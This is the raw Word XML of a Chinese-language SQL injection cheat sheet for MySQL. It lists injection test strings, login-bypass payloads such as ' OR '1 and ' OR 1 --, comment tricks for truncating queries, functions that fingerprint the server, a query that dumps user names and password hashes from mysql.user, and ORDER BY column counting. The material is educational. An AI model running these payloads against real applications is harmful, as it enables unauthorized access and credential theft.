          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc32473_WPSOffice_Level1"/>
      <w:bookmarkStart w:id="45" w:name="_Toc5382_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法与原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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3"/>
        </w:numPr>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc4567_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="47" w:name="_Toc18866_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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3"/>
        </w:numPr>
        <w:ind w:left="845" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc5856_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="49" w:name="_Toc16428_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL数据库知识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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50" w:name="_Toc5382_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>默认数据库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="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数据库名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需要root权限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information_schema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版本5及更高版本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51" w:name="_Toc31168_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p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测试SQL：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id FROM 表名 WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>条件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3015"/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字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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TRUE：SQL正确有效</w:t>
            </w:r>
          </w:p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FALSE：SQL报错无效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‘</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id =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‘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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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‘’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id =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‘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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’’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926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“</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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“”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id =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‘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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>””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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id =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‘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1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>\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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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\\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id =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‘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1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>\\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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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数字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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TRUE：结果有值</w:t>
            </w:r>
          </w:p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FALSE：结果为空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AND 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 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AND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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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AND 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 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AND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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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AND TRUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 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AND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TRUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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AND FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 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AND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FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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1 - TRUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 - TRUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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1 - FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 - FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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1 * 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015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id = 1 * 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926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TRUE（结果：id为5）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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 xml:space="preserve">登录SQL：SELECT * FROM 表名 WHERE username = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>; 得到表的所有数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="2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58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注入点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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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' OR '1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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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' OR 1 --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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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'='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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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'LIKE'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52" w:name="_Toc18866_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="82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1"/>
        <w:gridCol w:w="5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8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# </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>注释内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5626" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="top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注意：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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/*! SQL语句 */ 与 /* */ 对比，多了一个 “!”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/*! */可以执行里面的SQL语句。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>反引号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>（`）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>只能在用作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>别名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>时用于结束查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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 w:eastAsia="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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-- -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>注释内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5626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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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 w:eastAsia="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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;%00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>注释内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5626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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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 w:eastAsia="宋体"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>注释内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5626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ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier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1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/*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 注释内容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 */</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5626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420" w:left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53" w:name="_Toc16428_WPSOffice_Level3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="2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VERSION()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@@VERSION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@@GLOBAL.VERSION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54" w:name="_Toc18368_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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1"/>
        <w:gridCol w:w="5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库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="537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表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="537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列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5371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user,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SQL：查看所有用户和密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="537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user,password 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FROM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mysql.user;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当前用户</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="31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user()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current_user()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current_user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system_user()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session_user()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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55" w:name="_Toc22056_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库表名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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  <w:gridCol w:w="5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库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5783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information_schema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表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5783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schemata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列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5783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schema_name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7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SQL：查看所有数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> schema_name </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>FROM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> information_schema.schemata;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4"/>
        <w:gridCol w:w="4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库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4838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表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4838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列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4838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SQL：查看非root用户拥有权限的库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4838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db,user 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FROM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mysql.db;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当前数据库</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="1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database()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schema()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56" w:name="_Toc18676_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器主机名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="1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4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@@hostname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57" w:name="_Toc11833_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器MAC地址</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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7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UUID()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7665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SQL：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UUID();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结果：e93d1831-9c6e-11e9-b848-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>005056c00001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Courier New" w:hAnsi="Courier New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（每次结果都不一样，但是后面红色部分都是一样，这就是MAC地址）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注意：可能会在某些操作系统上返回48位随机字符串而不是MAC地址。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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58" w:name="_Toc15965_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>表和列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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6"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">确定列数（确定SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>列数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM 表明）。</w:t>
      </w:r>
    </w:p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SQL：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">id,name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>; （前提：报错信息可见）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4"/>
        <w:gridCol w:w="2040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29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方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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注入点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="357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4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GROUP / ORDER BY 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>n+1</w:t>
            </w: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1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>ORDER BY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 xml:space="preserve">1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3578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4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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
